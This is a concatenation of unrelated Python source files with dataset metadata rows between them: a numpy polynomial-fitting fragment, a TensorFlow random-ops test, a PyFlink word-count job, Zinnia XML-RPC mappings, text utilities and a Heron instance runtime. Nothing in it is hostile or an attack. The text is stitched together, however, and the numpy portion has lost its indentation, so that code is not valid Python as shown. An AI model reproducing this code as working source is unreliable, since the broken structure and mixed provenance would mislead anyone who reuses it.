x, y, z = np.array((x, y, z), copy=0) + 0.0
vx = polyvander(x, degx)
vy = polyvander(y, degy)
vz = polyvander(z, degz)
v = vx[..., None, None]*vy[..., None,:, None]*vz[..., None, None,:]
# einsum bug
#v = np.einsum("...i, ...j, ...k->...ijk", vx, vy, vz)
return v.reshape(v.shape[:-3] + (-1,))
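# Illustrative sketch (an addition, not in the original module): the same
# flattening equivalence holds in three dimensions:
#
#     >>> x = y = z = np.array([0., 1.])
#     >>> V = polyvander3d(x, y, z, [1, 1, 1])
#     >>> V.shape                        # x.shape + ((1+1)**3,)
#     (2, 8)
#     >>> c = np.arange(8.).reshape(2, 2, 2)
#     >>> np.allclose(np.dot(V, c.flat), polyval3d(x, y, z, c))
#     True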
def polyfit(x, y, deg, rcond=None, full=False, w=None):
"""
Least-squares fit of a polynomial to data.
Return the coefficients of a polynomial of degree `deg` that is the
least squares fit to the data values `y` given at points `x`. If `y` is
1-D the returned coefficients will also be 1-D. If `y` is 2-D multiple
fits are done, one for each column of `y`, and the resulting
coefficients are stored in the corresponding columns of a 2-D return.
The fitted polynomial(s) are in the form
.. math:: p(x) = c_0 + c_1 * x + ... + c_n * x^n,
where `n` is `deg`.
Since numpy version 1.7.0, polyfit also supports NA. If any of the
elements of `x`, `y`, or `w` are NA, then the corresponding rows of the
linear least squares problem (see Notes) are set to 0. If `y` is 2-D,
then an NA in any row of `y` invalidates that whole row.
Parameters
----------
x : array_like, shape (`M`,)
x-coordinates of the `M` sample (data) points ``(x[i], y[i])``.
y : array_like, shape (`M`,) or (`M`, `K`)
y-coordinates of the sample points. Several sets of sample points
sharing the same x-coordinates can be (independently) fit with one
call to `polyfit` by passing in for `y` a 2-D array that contains
one data set per column.
deg : int
Degree of the polynomial(s) to be fit.
rcond : float, optional
Relative condition number of the fit. Singular values smaller
than `rcond`, relative to the largest singular value, will be
ignored. The default value is ``len(x)*eps``, where `eps` is the
relative precision of the platform's float type, about 2e-16 in
most cases.
full : bool, optional
Switch determining the nature of the return value. When ``False``
(the default) just the coefficients are returned; when ``True``,
diagnostic information from the singular value decomposition (used
to solve the fit's matrix equation) is also returned.
w : array_like, shape (`M`,), optional
Weights. If not None, the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products ``w[i]*y[i]``
all have the same variance. The default value is None.
.. versionadded:: 1.5.0
Returns
-------
coef : ndarray, shape (`deg` + 1,) or (`deg` + 1, `K`)
Polynomial coefficients ordered from low to high. If `y` was 2-D,
the coefficients in column `k` of `coef` represent the polynomial
fit to the data in `y`'s `k`-th column.
[residuals, rank, singular_values, rcond] : present when `full` == True
Sum of the squared residuals (SSR) of the least-squares fit; the
effective rank of the scaled Vandermonde matrix; its singular
values; and the specified value of `rcond`. For more information,
see `linalg.lstsq`.
Raises
------
RankWarning
Raised if the matrix in the least-squares fit is rank deficient.
The warning is only raised if `full` == False. The warnings can
be turned off by:
>>> import warnings
>>> warnings.simplefilter('ignore', RankWarning)
See Also
--------
chebfit, legfit, lagfit, hermfit, hermefit
polyval : Evaluates a polynomial.
polyvander : Vandermonde matrix for powers.
linalg.lstsq : Computes a least-squares fit from the matrix.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution is the coefficients of the polynomial `p` that minimizes
the sum of the weighted squared errors
    .. math:: E = \\sum_j w_j^2 * |y_j - p(x_j)|^2,
where the :math:`w_j` are the weights. This problem is solved by
setting up the (typically) over-determined matrix equation:
    .. math:: V(x) * c = w * y,
where `V` is the weighted pseudo Vandermonde matrix of `x`, `c` are the
coefficients to be solved for, `w` are the weights, and `y` are the
observed values. This equation is then solved using the singular value
decomposition of `V`.
If some of the singular values of `V` are so small that they are
neglected (and `full` == ``False``), a `RankWarning` will be raised.
This means that the coefficient values may be poorly determined.
Fitting to a lower order polynomial will usually get rid of the warning
(but may not be what you want, of course; if you have independent
reason(s) for choosing the degree which isn't working, you may have to:
a) reconsider those reasons, and/or b) reconsider the quality of your
data). The `rcond` parameter can also be set to a value smaller than
its default, but the resulting fit may be spurious and have large
contributions from roundoff error.
Polynomial fits using double precision tend to "fail" at about
(polynomial) degree 20. Fits using Chebyshev or Legendre series are
generally better conditioned, but much can still depend on the
distribution of the sample points and the smoothness of the data. If
the quality of the fit is inadequate, splines may be a good
alternative.
Examples
--------
>>> from numpy import polynomial as P
>>> x = np.linspace(-1,1,51) # x "data": [-1, -0.96, ..., 0.96, 1]
>>> y = x**3 - x + np.random.randn(len(x)) # x^3 - x + N(0,1) "noise"
>>> c, stats = P.polyfit(x,y,3,full=True)
>>> c # c[0], c[2] should be approx. 0, c[1] approx. -1, c[3] approx. 1
array([ 0.01909725, -1.30598256, -0.00577963, 1.02644286])
>>> stats # note the large SSR, explaining the rather poor results
[array([ 38.06116253]), 4, array([ 1.38446749, 1.32119158, 0.50443316,
0.28853036]), 1.1324274851176597e-014]
Same thing without the added noise
>>> y = x**3 - x
>>> c, stats = P.polyfit(x,y,3,full=True)
>>> c # c[0], c[2] should be "very close to 0", c[1] ~= -1, c[3] ~= 1
array([ -1.73362882e-17, -1.00000000e+00, -2.67471909e-16,
1.00000000e+00])
>>> stats # note the minuscule SSR
[array([ 7.46346754e-31]), 4, array([ 1.38446749, 1.32119158,
0.50443316, 0.28853036]), 1.1324274851176597e-014]
"""
order = int(deg) + 1
x = np.asarray(x) + 0.0
y = np.asarray(y) + 0.0
# check arguments.
    if deg < 0:
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
    if y.ndim < 1 or y.ndim > 2:
raise TypeError("expected 1D or 2D array for y")
if len(x) != len(y):
raise TypeError("expected x and y to have same length")
# set up the least squares matrices in transposed form
lhs = polyvander(x, deg).T
rhs = y.T
if w is not None:
w = np.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected 1D vector for w")
if len(x) != len(w):
raise TypeError("expected x and w to have same length")
# apply weights. Don't use inplace operations as they
# can cause problems with NA.
lhs = lhs * w
rhs = rhs * w
# set rcond
    if rcond is None:
rcond = len(x)*np.finfo(x.dtype).eps
# Determine the norms of the design matrix columns.
if issubclass(lhs.dtype.type, np.complexfloating):
scl = np.sqrt((np.square(lhs.real) + np.square(lhs.imag)).sum(1))
else:
scl = np.sqrt(np.square(lhs).sum(1))
scl[scl == 0] = 1
# Solve the least squares problem.
c, resids, rank, s = la.lstsq(lhs.T/scl, rhs.T, rcond)
c = (c.T/scl).T
# warn on rank reduction
if rank != order and not full:
msg = "The fit may be poorly conditioned"
warnings.warn(msg, pu.RankWarning)
    if full:
        return c, [resids, rank, s, rcond]
    else:
        return c
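# Illustrative sketch (an addition, not in the original module): fitting
# noiseless data of the requested degree recovers the coefficients up to
# roundoff, exercising the scaled-Vandermonde least-squares path above:
#
#     >>> x = np.linspace(0., 1., 9)
#     >>> y = 2. + 3.*x                  # exact degree-1 data
#     >>> np.allclose(polyfit(x, y, 1), [2., 3.])
#     True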
def polycompanion(c):
"""
Return the companion matrix of c.
The companion matrix for power series cannot be made symmetric by
scaling the basis, so this function differs from those for the
orthogonal polynomials.
Parameters
----------
c : array_like
1-D array of polynomial coefficients ordered from low to high
degree.
Returns
-------
mat : ndarray
Companion matrix of dimensions (deg, deg).
Notes
-----
.. versionadded:: 1.7.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
    if len(c) < 2:
raise ValueError('Series must have maximum degree of at least 1.')
if len(c) == 2:
return np.array([[-c[0]/c[1]]])
n = len(c) - 1
mat = np.zeros((n, n), dtype=c.dtype)
bot = mat.reshape(-1)[n::n+1]
bot[...] = 1
mat[:, -1] -= c[:-1]/c[-1]
return mat
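# Illustrative sketch (an addition, not in the original module): for the
# monic cubic (x - 1)(x - 2)(x - 3) = -6 + 11x - 6x**2 + x**3 the companion
# matrix carries -c[:-1]/c[-1] in its last column and its eigenvalues are the
# roots of the polynomial (this assumes `la` is numpy.linalg, as used below):
#
#     >>> comp = polycompanion([-6., 11., -6., 1.])
#     >>> np.allclose(comp[:, -1], [6., -11., 6.])
#     True
#     >>> np.allclose(np.sort(la.eigvals(comp).real), [1., 2., 3.])
#     True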
def polyroots(c):
"""
Compute the roots of a polynomial.
Return the roots (a.k.a. "zeros") of the polynomial
.. math:: p(x) = \\sum_i c[i] * x^i.
Parameters
----------
c : 1-D array_like
1-D array of polynomial coefficients.
Returns
-------
out : ndarray
Array of the roots of the polynomial. If all the roots are real,
then `out` is also real, otherwise it is complex.
See Also
--------
chebroots
Notes
-----
The root estimates are obtained as the eigenvalues of the companion
    matrix. Roots far from the origin of the complex plane may have large
errors due to the numerical instability of the power series for such
values. Roots with multiplicity greater than 1 will also show larger
errors as the value of the series near such points is relatively
insensitive to errors in the roots. Isolated roots near the origin can
be improved by a few iterations of Newton's method.
Examples
--------
>>> import numpy.polynomial.polynomial as poly
>>> poly.polyroots(poly.polyfromroots((-1,0,1)))
array([-1., 0., 1.])
>>> poly.polyroots(poly.polyfromroots((-1,0,1))).dtype
dtype('float64')
>>> j = complex(0,1)
>>> poly.polyroots(poly.polyfromroots((-j,0,j)))
array([ 0.00000000e+00+0.j, 0.00000000e+00+1.j, 2.77555756e-17-1.j])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) < 2:
return np.array([], dtype=c.dtype)
if len(c) == 2:
return np.array([-c[0]/c[1]])
m = polycompanion(c)
r = la.eigvals(m)
r.sort()
return r
#
# polynomial class
#
exec(polytemplate.substitute(name='Polynomial', nick='poly', domain='[-1,1]'))
| gpl-2.0 | 4,744,763,754,743,930,000 | 30.54923 | 79 | 0.590833 | false |
ville-k/tensorflow | tensorflow/contrib/stateless/python/kernel_tests/stateless_random_ops_test.py | 54 | 3287 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for stateless random ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import stateless
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
CASES = [(stateless.stateless_random_uniform, random_ops.random_uniform),
(stateless.stateless_random_normal, random_ops.random_normal),
(stateless.stateless_truncated_normal, random_ops.truncated_normal)]
def invert_philox(key, value):
"""Invert the Philox bijection."""
key = np.array(key, dtype=np.uint32)
value = np.array(value, dtype=np.uint32)
step = np.array([0x9E3779B9, 0xBB67AE85], dtype=np.uint32)
for n in range(10)[::-1]:
key0, key1 = key + n * step
v0 = value[3] * 0x991a7cdb & 0xffffffff
v2 = value[1] * 0x6d7cae67 & 0xffffffff
hi0 = v0 * 0xD2511F53 >> 32
hi1 = v2 * 0xCD9E8D57 >> 32
v1 = hi1 ^ value[0] ^ key0
v3 = hi0 ^ value[2] ^ key1
value = v0, v1, v2, v3
return np.array(value)
class StatelessOpsTest(test.TestCase):
def testMatchStateful(self):
# Stateless ops should be the same as stateful ops on the first call
# after seed scrambling.
key = 0x3ec8f720, 0x02461e29
for seed in (7, 17), (11, 5), (2, 3):
preseed = invert_philox(key, (seed[0], 0, seed[1], 0)).astype(np.uint64)
preseed = preseed[::2] | preseed[1::2] << 32
random_seed.set_random_seed(seed[0])
with self.test_session(use_gpu=True):
for stateless_op, stateful_op in CASES:
for shape in (), (3,), (2, 5):
stateful = stateful_op(shape, seed=seed[1])
pure = stateless_op(shape, seed=preseed)
self.assertAllEqual(stateful.eval(), pure.eval())
def testDeterminism(self):
# Stateless values should be equal iff the seeds are equal (roughly)
with self.test_session(use_gpu=True):
seed_t = array_ops.placeholder(dtypes.int64, shape=[2])
seeds = [(x, y) for x in range(5) for y in range(5)] * 3
for stateless_op, _ in CASES:
for shape in (), (3,), (2, 5):
pure = stateless_op(shape, seed=seed_t)
values = [(seed, pure.eval(feed_dict={seed_t: seed}))
for seed in seeds]
for s0, v0 in values:
for s1, v1 in values:
self.assertEqual(s0 == s1, np.all(v0 == v1))
if __name__ == '__main__':
test.main()
| apache-2.0 | 7,203,800,734,959,563,000 | 38.130952 | 80 | 0.648312 | false |
tony810430/flink | flink-end-to-end-tests/flink-python-test/python/python_job.py | 2 | 3480 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import logging
import os
import shutil
import sys
import tempfile
from pyflink.table import EnvironmentSettings, TableEnvironment
def word_count():
content = "line Licensed to the Apache Software Foundation ASF under one " \
"line or more contributor license agreements See the NOTICE file " \
"line distributed with this work for additional information " \
"line regarding copyright ownership The ASF licenses this file " \
"to you under the Apache License Version the " \
"License you may not use this file except in compliance " \
"with the License"
env_settings = EnvironmentSettings.new_instance().in_batch_mode().use_blink_planner().build()
t_env = TableEnvironment.create(environment_settings=env_settings)
    # used to test pipeline.jars and pipeline.classpaths
config_key = sys.argv[1]
config_value = sys.argv[2]
t_env.get_config().get_configuration().set_string(config_key, config_value)
# register Results table in table environment
tmp_dir = tempfile.gettempdir()
result_path = tmp_dir + '/result'
if os.path.exists(result_path):
try:
if os.path.isfile(result_path):
os.remove(result_path)
else:
shutil.rmtree(result_path)
except OSError as e:
logging.error("Error removing directory: %s - %s.", e.filename, e.strerror)
logging.info("Results directory: %s", result_path)
sink_ddl = """
create table Results(
word VARCHAR,
`count` BIGINT,
`count_java` BIGINT
) with (
'connector.type' = 'filesystem',
'format.type' = 'csv',
'connector.path' = '{}'
)
""".format(result_path)
t_env.execute_sql(sink_ddl)
t_env.execute_sql("create temporary system function add_one as 'add_one.add_one' language python")
t_env.register_java_function("add_one_java", "org.apache.flink.python.tests.util.AddOne")
elements = [(word, 0) for word in content.split(" ")]
t_env.from_elements(elements, ["word", "count"]) \
.select("word, add_one(count) as count, add_one_java(count) as count_java") \
.group_by("word") \
.select("word, count(count) as count, count(count_java) as count_java") \
.execute_insert("Results")
if __name__ == '__main__':
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format="%(message)s")
word_count()
| apache-2.0 | 874,255,062,469,409,500 | 39.941176 | 102 | 0.626724 | false |
lu18887/perhapsgeekblog | perhapsgeek/zinnia/xmlrpc/__init__.py | 14 | 1235 | """XML-RPC methods for Zinnia"""
ZINNIA_XMLRPC_PINGBACK = [
('zinnia.xmlrpc.pingback.pingback_ping',
'pingback.ping'),
('zinnia.xmlrpc.pingback.pingback_extensions_get_pingbacks',
'pingback.extensions.getPingbacks')]
ZINNIA_XMLRPC_METAWEBLOG = [
('zinnia.xmlrpc.metaweblog.get_users_blogs',
'blogger.getUsersBlogs'),
('zinnia.xmlrpc.metaweblog.get_user_info',
'blogger.getUserInfo'),
('zinnia.xmlrpc.metaweblog.delete_post',
'blogger.deletePost'),
('zinnia.xmlrpc.metaweblog.get_authors',
'wp.getAuthors'),
('zinnia.xmlrpc.metaweblog.get_tags',
'wp.getTags'),
('zinnia.xmlrpc.metaweblog.get_categories',
'metaWeblog.getCategories'),
('zinnia.xmlrpc.metaweblog.new_category',
'wp.newCategory'),
('zinnia.xmlrpc.metaweblog.get_recent_posts',
'metaWeblog.getRecentPosts'),
('zinnia.xmlrpc.metaweblog.get_post',
'metaWeblog.getPost'),
('zinnia.xmlrpc.metaweblog.new_post',
'metaWeblog.newPost'),
('zinnia.xmlrpc.metaweblog.edit_post',
'metaWeblog.editPost'),
('zinnia.xmlrpc.metaweblog.new_media_object',
'metaWeblog.newMediaObject')]
ZINNIA_XMLRPC_METHODS = ZINNIA_XMLRPC_PINGBACK + ZINNIA_XMLRPC_METAWEBLOG
| mit | 6,761,041,865,636,405,000 | 33.305556 | 73 | 0.688259 | false |
zhiyanfoo/crunch-shake | crunch-shake/utils.py | 2 | 1649 | import json
import re
from collections import namedtuple
import string
# INPUT OUTPUT
def file_to_list(path):
with open(path, 'r') as inputFile:
return inputFile.readlines()
def json_file_to_dict(path):
with open(path, 'r') as jsonFile:
return json.load(jsonFile)
def to_json(x, path):
with open(path, 'w') as jsonFile:
json.dump(x, jsonFile)
def list_to_file(li, path):
with open(path, 'w') as outputFile:
outputFile.writelines(li)
def str_to_file(x, path):
with open(path, 'w') as outputFile:
outputFile.write(x)
# MATCHERS
def get_title(raw_play_lines):
pattern = re.compile("<title>(.*): Entire Play.*")
for line in raw_play_lines:
match = pattern.search(line)
if match:
return match.group(1)
    raise ValueError("could not find a title in the given play lines")
def get_matcher(words, identifier):
joined_words = "|".join(words)
pattern = "(?P<{0}>".format(identifier) + joined_words + ")"
matcher = re.compile(
pattern,
re.IGNORECASE)
return matcher
Matcher = namedtuple('Matcher', ['dialogue', 'character', 'stage_direction',
'instruction', 'act', 'scene'])
# HELPERS
def invert_dict(front_dict):
""" Take a dict of key->values and return values->[keys] """
back_dict = { value : [] for value in front_dict.values() }
for key, value in front_dict.items():
back_dict[value].append(key)
return back_dict
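# Minimal usage sketch (an addition, not in the original module): invert_dict
# groups keys by their value; list order follows dict iteration order.
#
#     >>> back = invert_dict({'a': 1, 'b': 1, 'c': 2})
#     >>> sorted(back[1]), back[2]
#     (['a', 'b'], ['c'])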
def create_remove_punctuation():
remove_punct_map = dict.fromkeys(map(ord, string.punctuation))
def remove_punctuation(line):
return line.translate(remove_punct_map)
return remove_punctuation
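# Minimal usage sketch (an addition, not in the original module): the factory
# builds the translation table once so the returned closure can be applied
# cheaply to many lines.
#
#     >>> strip = create_remove_punctuation()
#     >>> strip("Hello, world!")
#     'Hello world'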
| mit | -944,120,410,777,327,200 | 25.596774 | 76 | 0.639782 | false |
huijunwu/heron | heron/instance/src/python/instance/st_heron_instance.py | 5 | 17184 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''module for single-thread Heron Instance in python'''
import argparse
import collections
import logging
import os
import resource
import traceback
import signal
import yaml
import heronpy.api.api_constants as api_constants
from heronpy.api.state.state import HashMapState
from heron.common.src.python.utils import log
from heron.proto import physical_plan_pb2, tuple_pb2, ckptmgr_pb2, common_pb2
from heron.instance.src.python.utils.misc import HeronCommunicator
from heron.instance.src.python.utils.misc import SerializerHelper
from heron.instance.src.python.utils.misc import PhysicalPlanHelper
from heron.instance.src.python.utils.metrics import GatewayMetrics, PyMetrics, MetricsCollector
from heron.instance.src.python.network import MetricsManagerClient, SingleThreadStmgrClient
from heron.instance.src.python.network import create_socket_options
from heron.instance.src.python.network import GatewayLooper
from heron.instance.src.python.basics import SpoutInstance, BoltInstance
import heron.instance.src.python.utils.system_constants as constants
from heron.instance.src.python.utils import system_config
Log = log.Log
AssignedInstance = collections.namedtuple('AssignedInstance', 'is_spout, protobuf, py_class')
def set_resource_limit(max_ram):
resource.setrlimit(resource.RLIMIT_RSS, (max_ram, max_ram))
# pylint: disable=too-many-instance-attributes
class SingleThreadHeronInstance(object):
"""SingleThreadHeronInstance is an implementation of Heron Instance in python"""
STREAM_MGR_HOST = "127.0.0.1"
METRICS_MGR_HOST = "127.0.0.1"
def __init__(self, topology_name, topology_id, instance,
stream_port, metrics_port, topo_pex_file_path):
# Basic information about this heron instance
self.topology_name = topology_name
self.topology_id = topology_id
self.instance = instance
self.stream_port = stream_port
self.metrics_port = metrics_port
self.topo_pex_file_abs_path = os.path.abspath(topo_pex_file_path)
self.sys_config = system_config.get_sys_config()
self.in_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
self.out_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
self.socket_map = dict()
self.looper = GatewayLooper(self.socket_map)
# Initialize metrics related
self.out_metrics = HeronCommunicator()
self.out_metrics.\
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_METRICS_WRITE_QUEUE_CAPACITY])
self.metrics_collector = MetricsCollector(self.looper, self.out_metrics)
self.gateway_metrics = GatewayMetrics(self.metrics_collector)
self.py_metrics = PyMetrics(self.metrics_collector)
# Create socket options and socket clients
socket_options = create_socket_options()
self._stmgr_client = \
SingleThreadStmgrClient(self.looper, self, self.STREAM_MGR_HOST, stream_port,
topology_name, topology_id, instance, self.socket_map,
self.gateway_metrics, socket_options)
self._metrics_client = \
MetricsManagerClient(self.looper, self.METRICS_MGR_HOST, metrics_port, instance,
self.out_metrics, self.in_stream, self.out_stream,
self.socket_map, socket_options, self.gateway_metrics, self.py_metrics)
self.my_pplan_helper = None
self.serializer = None
# my_instance is a AssignedInstance tuple
self.my_instance = None
self.is_instance_started = False
self.is_stateful_started = False
self.stateful_state = None
# Debugging purposes
def go_trace(_, stack):
with open("/tmp/trace.log", "w") as f:
traceback.print_stack(stack, file=f)
self.looper.register_timer_task_in_sec(self.looper.exit_loop, 0.0)
signal.signal(signal.SIGUSR1, go_trace)
def start(self):
self._stmgr_client.start_connect()
self._metrics_client.start_connect()
# call send_buffered_messages every time it is waken up
self.looper.add_wakeup_task(self.send_buffered_messages)
self.looper.loop()
def handle_new_tuple_set_2(self, hts2):
"""Called when new HeronTupleSet2 arrives
    Converts (assembles) a HeronTupleSet2 (raw byte array) into a HeronTupleSet
See more at GitHub PR #1421
    :param hts2: HeronTupleSet2 type
"""
if self.my_pplan_helper is None or self.my_instance is None:
Log.error("Got tuple set when no instance assigned yet")
else:
hts = tuple_pb2.HeronTupleSet()
if hts2.HasField('control'):
hts.control.CopyFrom(hts2.control)
else:
hdts = tuple_pb2.HeronDataTupleSet()
hdts.stream.CopyFrom(hts2.data.stream)
try:
for trunk in hts2.data.tuples:
added_tuple = hdts.tuples.add()
added_tuple.ParseFromString(trunk)
except Exception:
Log.exception('Fail to deserialize HeronDataTuple')
hts.data.CopyFrom(hdts)
self.in_stream.offer(hts)
if self.my_pplan_helper.is_topology_running():
self.my_instance.py_class.process_incoming_tuples()
def handle_initiate_stateful_checkpoint(self, ckptmsg):
"""Called when we get InitiateStatefulCheckpoint message
:param ckptmsg: InitiateStatefulCheckpoint type
"""
self.in_stream.offer(ckptmsg)
if self.my_pplan_helper.is_topology_running():
self.my_instance.py_class.process_incoming_tuples()
def handle_start_stateful_processing(self, start_msg):
"""Called when we receive StartInstanceStatefulProcessing message
:param start_msg: StartInstanceStatefulProcessing type
"""
Log.info("Received start stateful processing for %s" % start_msg.checkpoint_id)
self.is_stateful_started = True
self.start_instance_if_possible()
def handle_restore_instance_state(self, restore_msg):
"""Called when we receive RestoreInstanceStateRequest message
:param restore_msg: RestoreInstanceStateRequest type
"""
Log.info("Restoring instance state to checkpoint %s" % restore_msg.state.checkpoint_id)
# Stop the instance
if self.is_stateful_started:
self.my_instance.py_class.stop()
self.my_instance.py_class.clear_collector()
self.is_stateful_started = False
# Clear all buffers
self.in_stream.clear()
self.out_stream.clear()
# Deser the state
if self.stateful_state is not None:
self.stateful_state.clear()
if restore_msg.state.state is not None and restore_msg.state.state:
try:
self.stateful_state = self.serializer.deserialize(restore_msg.state.state)
except Exception as e:
raise RuntimeError("Could not serialize state during restore " + str(e))
else:
Log.info("The restore request does not have an actual state")
if self.stateful_state is None:
self.stateful_state = HashMapState()
Log.info("Instance restore state deserialized")
# Send the response back
resp = ckptmgr_pb2.RestoreInstanceStateResponse()
resp.status.status = common_pb2.StatusCode.Value("OK")
resp.checkpoint_id = restore_msg.state.checkpoint_id
self._stmgr_client.send_message(resp)
def send_buffered_messages(self):
"""Send messages in out_stream to the Stream Manager"""
while not self.out_stream.is_empty() and self._stmgr_client.is_registered:
tuple_set = self.out_stream.poll()
if isinstance(tuple_set, tuple_pb2.HeronTupleSet):
tuple_set.src_task_id = self.my_pplan_helper.my_task_id
self.gateway_metrics.update_sent_packet(tuple_set.ByteSize())
self._stmgr_client.send_message(tuple_set)
def _handle_state_change_msg(self, new_helper):
"""Called when state change is commanded by stream manager"""
assert self.my_pplan_helper is not None
assert self.my_instance is not None and self.my_instance.py_class is not None
if self.my_pplan_helper.get_topology_state() != new_helper.get_topology_state():
# handle state change
# update the pplan_helper
self.my_pplan_helper = new_helper
if new_helper.is_topology_running():
if not self.is_instance_started:
self.start_instance_if_possible()
self.my_instance.py_class.invoke_activate()
elif new_helper.is_topology_paused():
self.my_instance.py_class.invoke_deactivate()
else:
raise RuntimeError("Unexpected TopologyState update: %s" % new_helper.get_topology_state())
else:
Log.info("Topology state remains the same.")
def handle_assignment_msg(self, pplan):
"""Called when new NewInstanceAssignmentMessage arrives
Tells this instance to become either spout/bolt.
:param pplan: PhysicalPlan proto
"""
new_helper = PhysicalPlanHelper(pplan, self.instance.instance_id,
self.topo_pex_file_abs_path)
if self.my_pplan_helper is not None and \
(self.my_pplan_helper.my_component_name != new_helper.my_component_name or
self.my_pplan_helper.my_task_id != new_helper.my_task_id):
raise RuntimeError("Our Assignment has changed. We will die to pick it.")
new_helper.set_topology_context(self.metrics_collector)
if self.my_pplan_helper is None:
Log.info("Received a new Physical Plan")
Log.info("Push the new pplan_helper to Heron Instance")
self._handle_assignment_msg(new_helper)
else:
Log.info("Received a new Physical Plan with the same assignment -- State Change")
Log.info("Old state: %s, new state: %s.",
self.my_pplan_helper.get_topology_state(), new_helper.get_topology_state())
self._handle_state_change_msg(new_helper)
def _handle_assignment_msg(self, pplan_helper):
self.my_pplan_helper = pplan_helper
self.serializer = SerializerHelper.get_serializer(self.my_pplan_helper.context)
if self.my_pplan_helper.is_spout:
# Starting a spout
my_spout = self.my_pplan_helper.get_my_spout()
Log.info("Incarnating ourselves as spout: %s with task id %s",
self.my_pplan_helper.my_component_name, str(self.my_pplan_helper.my_task_id))
self.in_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_SPOUT_READ_QUEUE_CAPACITY])
self.out_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_SPOUT_WRITE_QUEUE_CAPACITY])
py_spout_instance = SpoutInstance(self.my_pplan_helper, self.in_stream, self.out_stream,
self.looper)
self.my_instance = AssignedInstance(is_spout=True,
protobuf=my_spout,
py_class=py_spout_instance)
else:
# Starting a bolt
my_bolt = self.my_pplan_helper.get_my_bolt()
Log.info("Incarnating ourselves as bolt: %s with task id %s",
self.my_pplan_helper.my_component_name, str(self.my_pplan_helper.my_task_id))
self.in_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_BOLT_READ_QUEUE_CAPACITY])
self.out_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_BOLT_WRITE_QUEUE_CAPACITY])
py_bolt_instance = BoltInstance(self.my_pplan_helper, self.in_stream, self.out_stream,
self.looper)
self.my_instance = AssignedInstance(is_spout=False,
protobuf=my_bolt,
py_class=py_bolt_instance)
if self.my_pplan_helper.is_topology_running():
try:
self.start_instance_if_possible()
except Exception as e:
Log.error("Error with starting bolt/spout instance: " + str(e))
Log.error(traceback.format_exc())
else:
Log.info("The instance is deployed in deactivated state")
def start_instance_if_possible(self):
if self.my_pplan_helper is None:
return
if not self.my_pplan_helper.is_topology_running():
return
context = self.my_pplan_helper.context
mode = context.get_cluster_config().get(api_constants.TOPOLOGY_RELIABILITY_MODE,
api_constants.TopologyReliabilityMode.ATMOST_ONCE)
is_stateful = bool(mode == api_constants.TopologyReliabilityMode.EFFECTIVELY_ONCE)
if is_stateful and not self.is_stateful_started:
return
try:
Log.info("Starting bolt/spout instance now...")
self.my_instance.py_class.start(self.stateful_state)
self.is_instance_started = True
Log.info("Started instance successfully.")
except Exception as e:
Log.error(traceback.format_exc())
Log.error("Error when starting bolt/spout, bailing out...: %s", str(e))
self.looper.exit_loop()
def yaml_config_reader(config_path):
"""Reads yaml config file and returns auto-typed config_dict"""
if not config_path.endswith(".yaml"):
raise ValueError("Config file not yaml")
with open(config_path, 'r') as f:
    config = yaml.safe_load(f)  # safe_load avoids constructing arbitrary Python objects
return config
# pylint: disable=missing-docstring
def main():
parser = argparse.ArgumentParser(description='Heron Python Instance')
parser.add_argument('--topology_name', required=True, help='Topology Name')
parser.add_argument('--topology_id', required=True, help='Topology Id')
parser.add_argument('--instance_id', required=True, help='Instance Id')
parser.add_argument('--component_name', required=True, help='Component Name')
parser.add_argument('--task_id', required=True, help='Task Id', type=int)
parser.add_argument('--component_index', required=True, help='Component Index', type=int)
parser.add_argument('--stmgr_id', required=True, help='StMgr Id')
parser.add_argument('--stmgr_port', required=True, help='StMgr Port', type=int)
parser.add_argument('--metricsmgr_port', required=True, help='MetricsMgr Port', type=int)
parser.add_argument('--sys_config', required=True, help='System Config File')
parser.add_argument('--override_config', required=True, help='Override Config File')
parser.add_argument('--topology_pex', required=True, help='Topology Pex File')
